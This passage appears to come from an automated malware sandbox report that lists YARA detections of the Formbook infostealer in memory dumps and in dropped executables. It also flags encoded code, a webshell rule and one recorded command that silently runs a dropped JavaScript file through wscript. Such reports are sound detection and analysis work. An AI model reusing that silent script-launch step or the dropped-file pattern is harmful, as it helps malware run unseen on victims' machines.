Source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Wscript called in batch mode (surpress errors)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js Jump to behavior
Yara signature match
Source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.402204010.000001873775D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.388216987.00000187377E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.921876626.0000020FBC1E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.386427385.0000018737747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.403161065.000001873775E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.388318935.0000018737762000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.402093855.0000018737752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.396207507.00000187377A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.398203323.00000187377E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.398506960.000001873779E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.396086134.00000187377EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.922283429.0000026A4F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.396200363.000001873779E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000008.00000002.921864833.0000020FBC1DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.387944732.00000187377E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.401344899.00000187377EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wscript.exe PID: 5708, type: MEMORYSTR Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
